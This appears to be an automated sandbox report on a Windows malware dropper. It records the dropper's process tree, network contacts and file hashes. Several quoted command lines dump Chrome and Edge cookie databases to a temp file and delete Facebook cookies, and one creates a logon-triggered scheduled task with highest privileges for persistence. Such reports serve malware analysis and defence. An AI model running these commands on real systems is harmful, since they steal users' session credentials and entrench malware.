PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe

jobiea_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe

jobiea_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe

jobiea_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp" /SL5="$60158,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe

jobiea_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.exe

jobiea_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe

jobiea_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe

jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe

jobiea_7.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 272

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732633221 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 424

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
N/A 127.0.0.1:49277 tcp
N/A 127.0.0.1:49280 tcp
US 8.8.8.8:53 superstationcity.com udp
US 8.8.8.8:53 most-fast-link-download.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 zisiarenal.xyz udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 sanctam.net udp
SG 37.0.11.9:80 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.microsoft.com udp
SG 37.0.11.9:80 tcp
SG 37.0.11.9:80 tcp
SG 37.0.11.9:80 tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe

MD5 53e7a64679ca4f7013fa4d5a99e468ce
SHA1 1af9957eb5e0cc4aae3d2dfecdcd157973c60740
SHA256 7efe1fe3251a3c4a7b617b28159b2d95526f25c367d5b8ae6152eae8d61d3b09
SHA512 21708bff7f2b1bd68101ad68dc288f0d1ac5cb57eec47dbff25b260571335fb95520be53577a9e2c286bfceccefaaa821a3932f39ad07276822855c52724153c

memory/1548-34-0x00000000033C0000-0x00000000034DE000-memory.dmp

memory/1548-41-0x00000000033C0000-0x00000000034DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC0678A96\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2228-48-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2228-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC0678A96\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2228-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2228-77-0x0000000000400000-0x000000000051E000-memory.dmp

memory/2228-73-0x0000000000400000-0x000000000051E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.txt

MD5 270dd1da0ab7f38cdff6fab84562ec7a
SHA1 cf7be169ee4415085baeb4aeaa60932ac5abf4ac
SHA256 7d7d5ae0fa9286fea65a6f94240389998ff0d08340a2aedc67ef3547e84d64c6
SHA512 dc3d7d112a8e43c34261f3425ef6710d61cb92d797dd4a1e9b04e02971db42a4a2e2488bf5397c0ec9a6a1a6a718cec77c379377647402099cb7e4a5bb381286

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.txt

MD5 88b6a56754826eb2bef62f924dc7cad1
SHA1 7fe9a4062f27fa3a4680fa477d318f79a5c05d0e
SHA256 1c860063f8a60beadbda89e4467ded5291c50630d49f3f3d3c5964d48cf6165e
SHA512 352c0988c54618ad5e6ba9a756532e15e70401ca6cd7f1931d25c93c3af7665fbc90bd8079b1f1b9a13a1d3e1009ea2c798110825a2c4ebef17620affc13b112

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.txt

MD5 e7aead0a71f897afb254f3a08722de8d
SHA1 aa41126b5694f27cf9edb32913044abeb152bdf7
SHA256 2d8620595da28433fa92b80eaac2560300f7be34bbf14280c843f6b033e5f6eb
SHA512 f589708c51a7d1414018d664fb82d67b220b262e90e00c5c6f30cc3c30930b734a3b0df412ae3e372cec8c3839c8b2e7cb218083be217eabc20b05ba6e236de8

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.txt

MD5 3d7cb53c9a570dc454c1f209ac8e33b7
SHA1 40b96a338aebe63c9b794547e840c9dd3470af6b
SHA256 8bcd2b42e543f9638e5027e4e5cb19c46dd2bbed9f2038524b65d882f1775005
SHA512 cb250d5fdbaa90ae715856e791e4d0afb6ee2ba9975e48b9059a15926f481abb296b8340433c3aa36d56288981c6f3b67af503f61c16afc0d75e83e3ebd967cd

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.txt

MD5 52e5bf9bc7e415e0dd079bfa2d753054
SHA1 086f3ca067952333f587384ec81ac5cfb343d1db
SHA256 19c5cf5343d2ab1b120d41b3c536340ccb8a6c0656ba9567d7ce5afaed18e277
SHA512 f3386dc44073be1f3bdf471a0144363a55311088738a4e0d87250f2038bcf41bd884afbce8a4d98f57a82d7ba8cfe68c9366ef4c5ba9250a0e470806338054bc

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.txt

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.txt

MD5 01486414c872995f04d7a157c4fb4f50
SHA1 c135c2c5cf4a3abdd5be5c78ef4424601289cdbb
SHA256 838d963c1db2236db9b12a2ebfd44c7e267afcf2dc79ef3ca4f81416f527b122
SHA512 60587beeaf28c95ada7e7b9cb41e148b7aace8d7134de13c42751295fb4024ae05ec5f9772ad1fd4efdaa559136bd079a91c6cfd9efd6880c8bdf61b9b586556

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.txt

MD5 de9ac7ed448ac60b2e376edfc1f24253
SHA1 465b102df59d83aa1905e0f50183bb432d319f49
SHA256 3f3d534e98560d0f53b5f6eeb9d0450de897ee467428659de7e72d74eba6735c
SHA512 cb13c421e6d7706b8b9266b736eeb1ad65ed599a8802168d27aab3f2e58dba8d9cf74ede874e886e697347cdb76b34913e569dbb1f8306fb999e99416d22ee7d

\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

memory/2236-99-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp

MD5 9638f27a949cc2c5ba8eacaa5532256c
SHA1 5de822a91542245433b43cfb73c0bfc3cb4abc22
SHA256 263717e1bc127eb304a9e2f5f9498eb1de3104a4706b22401cff24554bed4e38
SHA512 1972e6aca6be4fb1c44de1e2aee43cb982024a52d88fa57b982592aa599d9eface31d4e67ced2f9a30e6c5120284e775f61f68dd08baae2eb59223f5083f3dac

\Users\Admin\AppData\Local\Temp\is-FQ6VN.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/1704-139-0x0000000000F90000-0x000000000107E000-memory.dmp

memory/2952-140-0x0000000001070000-0x00000000010DA000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-FQ6VN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2228-78-0x0000000000400000-0x000000000051E000-memory.dmp

memory/2228-76-0x0000000000400000-0x000000000051E000-memory.dmp

memory/2228-75-0x0000000000400000-0x000000000051E000-memory.dmp

memory/824-141-0x0000000001030000-0x0000000001066000-memory.dmp

memory/2228-74-0x0000000000400000-0x000000000051E000-memory.dmp

memory/2228-72-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2228-71-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2228-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2228-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2228-69-0x0000000000B00000-0x0000000000C1E000-memory.dmp

memory/2228-68-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2228-67-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2228-66-0x0000000000B00000-0x0000000000C1E000-memory.dmp

memory/2228-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2228-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2228-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2228-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2228-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/824-143-0x00000000003D0000-0x00000000003D6000-memory.dmp

memory/2832-148-0x000000013F390000-0x000000013F3A0000-memory.dmp

memory/824-149-0x00000000003E0000-0x0000000000406000-memory.dmp

memory/824-151-0x0000000000470000-0x0000000000476000-memory.dmp

memory/2168-153-0x0000000000470000-0x0000000000554000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2696-164-0x00000000007B0000-0x0000000000894000-memory.dmp

memory/1448-173-0x0000000000400000-0x0000000000516000-memory.dmp

memory/2236-174-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

memory/1684-180-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/2484-187-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1684-188-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/3008-193-0x0000000000240000-0x000000000029B000-memory.dmp

memory/2484-184-0x0000000000240000-0x000000000029B000-memory.dmp

memory/2484-183-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2228-182-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3008-192-0x0000000000400000-0x000000000045B000-memory.dmp

memory/3008-190-0x0000000000240000-0x000000000029B000-memory.dmp

memory/3008-189-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1684-181-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1664-205-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1664-204-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1664-203-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1664-202-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1664-200-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1664-198-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1664-196-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1664-194-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2228-206-0x0000000000400000-0x000000000051E000-memory.dmp

memory/2228-215-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2228-214-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2228-213-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2228-212-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2228-210-0x000000006EB40000-0x000000006EB63000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabDD27.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarDD59.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1684-255-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1684-258-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1684-257-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1684-256-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/2728-261-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2652-264-0x0000000000850000-0x00000000008AB000-memory.dmp

memory/3008-267-0x0000000000240000-0x000000000029B000-memory.dmp

memory/2652-266-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1684-263-0x00000000005B0000-0x000000000060B000-memory.dmp

memory/1684-262-0x00000000005B0000-0x000000000060B000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
